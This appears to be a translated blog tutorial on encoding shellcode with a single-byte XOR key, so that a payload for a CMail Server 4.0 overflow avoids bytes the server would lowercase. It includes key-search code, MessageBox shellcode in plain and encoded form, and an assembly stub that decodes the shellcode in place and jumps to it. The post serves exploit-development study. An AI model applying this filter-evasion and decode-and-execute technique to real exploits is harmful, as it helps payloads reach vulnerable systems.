Programming key for shellcode xor Solution

Source: Internet
Author: User

Recently I started learning about stack overflows, and I picked the simplest remote overflow I could find: the USER command of CMail Server 4.0.

CMail converts uppercase letters in the shellcode to lowercase, so bytes between 0x40 and 0x5B must be avoided. The expert F.zh used a small shellcode to locate the big shellcode in the original input. As a beginner, I also wanted to work out my own approach while learning from his idea, so I decided to use the primitive XOR algorithm to encode the shellcode. But how do we find a suitable key for the XOR operation? Here is my idea.

Environment: VMware 7.1 + Windows 2000 Advanced Server SP4 (Chinese) + VC++ 6.0

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

unsigned char shellcode[] =
"\x33\xdb\x53\x68\x46\x55\x43\x4b"
"\x8b\xc4\x53\x50\x50\x53"
"\xb8\x98\x80\xe1\x77\xff\xd0"; // shellcode: MessageBox on Windows 2000 Adv Server SP4, 21 bytes

int main()
{
    int i, len, tmp, key = 0x99;
    unsigned char *buf;

    len = strlen((char *)shellcode);            // works only because the shellcode contains no 0x00 byte
    buf = (unsigned char *)malloc(sizeof(char) * (len + 1));
    memset(buf, 0, len + 1);                    // sizeof(buf) would only clear the size of a pointer

    printf("Try to xor key from 0x01 to 0x99 for shellcode\n");

    while (key)
    {
        for (i = 0; i < len; i++)
        {
            tmp = shellcode[i] ^ key;
            if (tmp > 0x40 && tmp < 0x5B) break; // encoded byte would be an uppercase letter: reject this key
            buf[i] = (unsigned char)tmp;
        }
        if (i == len)                            // every encoded byte passed the filter
        {
            printf("Yes!!! I found a key 0x%x for xor:\n", key);
            printf("unsigned char shellcode[] =\n\"");
            for (i = 0; i < len; i++)
            {
                printf("\\x%02x", buf[i]);
                if ((i + 1) % 8 == 0) printf("\"\n\"");   // start a new string literal every 8 bytes
            }
            printf("\"; // xor key 0x%02x\n", key);
            break;
        }
        key--;
    }
    free(buf);
    return 0;
}

The code is simple enough to follow. Compile and run it, and a key is printed.
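As an added example (not part of the original post), here is a more general form of the same key search in C. The bad-byte test is passed in as a function so the same search can reject only uppercase letters, as the post does, or uppercase letters plus 0x00, which matters whenever the payload travels inside a C string; the search reports when no key in the searched range passes instead of silently printing nothing; and the encoded bytes are decoded again to confirm the round trip restores the original. The 21 shellcode bytes are copied from the post; the function names, the `hi`/`lo` range arguments and the NUL-aware filter are this example's own assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Sample input: the 21-byte MessageBox stub listed in the post, copied here
   as a byte array so the search can be checked against a known answer. */
static const unsigned char sample_shellcode[] = {
    0x33, 0xdb, 0x53, 0x68, 0x46, 0x55, 0x43, 0x4b,
    0x8b, 0xc4, 0x53, 0x50, 0x50, 0x53,
    0xb8, 0x98, 0x80, 0xe1, 0x77, 0xff, 0xd0
};
#define SAMPLE_LEN (sizeof sample_shellcode)

/* Filled in by sample_roundtrip(): the encoded form of the sample. */
unsigned char sample_encoded[SAMPLE_LEN];

/* The post's filter: the server lowercases 0x41..0x5A, so those bytes
   would not arrive intact. */
bool is_upper_letter(unsigned char b) { return b >= 0x41 && b <= 0x5A; }

/* A stricter filter (this example's assumption): also reject 0x00, because
   anything delivered as a C string is cut off at the first NUL. */
bool is_upper_or_nul(unsigned char b) { return b == 0x00 || is_upper_letter(b); }

/* Try every key from `hi` down to `lo` (the post searches 0x99 down to 0x01)
   and return the first key for which no encoded byte is rejected by
   is_bad(), or -1 when no key in that range works. */
int find_xor_key(const unsigned char *sc, size_t len,
                 unsigned char hi, unsigned char lo,
                 bool (*is_bad)(unsigned char))
{
    for (int key = hi; key >= lo; key--) {
        size_t i = 0;
        while (i < len && !is_bad((unsigned char)(sc[i] ^ key)))
            i++;
        if (i == len)           /* every byte survived the filter */
            return key;
    }
    return -1;
}

/* XOR each byte with the key in place. One call encodes, a second call
   with the same key decodes; this is what the post's __asm loop does. */
void xor_buffer(unsigned char *buf, size_t len, unsigned char key)
{
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key;
}

/* Search a key for the sample with the given filter, encode it into
   sample_encoded, then decode a copy and confirm the original comes back.
   Returns the key, or -1 if no key was found or the round trip failed. */
int sample_roundtrip(bool (*is_bad)(unsigned char))
{
    unsigned char work[SAMPLE_LEN];
    int key = find_xor_key(sample_shellcode, SAMPLE_LEN, 0x99, 0x01, is_bad);
    if (key < 0)
        return -1;
    memcpy(work, sample_shellcode, SAMPLE_LEN);
    xor_buffer(work, SAMPLE_LEN, (unsigned char)key);   /* encode */
    memcpy(sample_encoded, work, SAMPLE_LEN);
    xor_buffer(work, SAMPLE_LEN, (unsigned char)key);   /* decode again */
    return memcmp(work, sample_shellcode, SAMPLE_LEN) == 0 ? key : -1;
}

int main(void)
{
    int key = sample_roundtrip(is_upper_or_nul);
    if (key < 0) {
        puts("no single-byte XOR key avoids the bad bytes");
        return 1;
    }
    printf("key 0x%02x, encoded:", key);
    for (size_t i = 0; i < SAMPLE_LEN; i++)
        printf(" %02x", sample_encoded[i]);
    putchar('\n');
    return 0;
}
```

Run over the post's 21 bytes in the post's search order (0x99 down to 0x01), `find_xor_key` returns 0x73 with either filter, the same key the author found, and the encoded bytes match the post's second listing. Restricting the range to 0x74..0x99 returns -1: every key there maps one of 0x33, 0xc4, 0xd0 or 0xdb into the uppercase range, which the post's loop would report only as an empty output.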


Load the encoded shellcode to see the effect.

#include <stdio.h>
#include <windows.h>

/*
char shellcode[] =
"\x33\xdb\x53\x68\x46\x55\x43\x4b"
"\x8b\xc4\x53\x50\x50\x53"
"\xb8\x98\x80\xe1\x77\xff\xd0"; // original shellcode, 21 bytes
*/
unsigned char shellcode[] =
"\x40\xa8\x20\x1b\x35\x26\x30\x38"
"\xf8\xb7\x20\x23\x23\x20\xcb\xeb"
"\xf3\x92\x04\x8c\xa3"; // xor key 0x73

void main()
{
    LoadLibrary("user32.dll");  // the shellcode calls MessageBox at a hard-coded address, so user32 must be mapped

    __asm
    {
        push ecx
        push eax

        xor  ecx, ecx
        add  ecx, 21            ; number of bytes to decode
        lea  eax, shellcode
    A:
        xor  byte ptr [eax], 73h ; undo the XOR with key 0x73, one byte at a time
        add  eax, 1
        loop A

        lea  eax, shellcode     ; decoded in place, now jump to it
        jmp  eax
    }
}

After decoding, the shellcode runs without any problem:

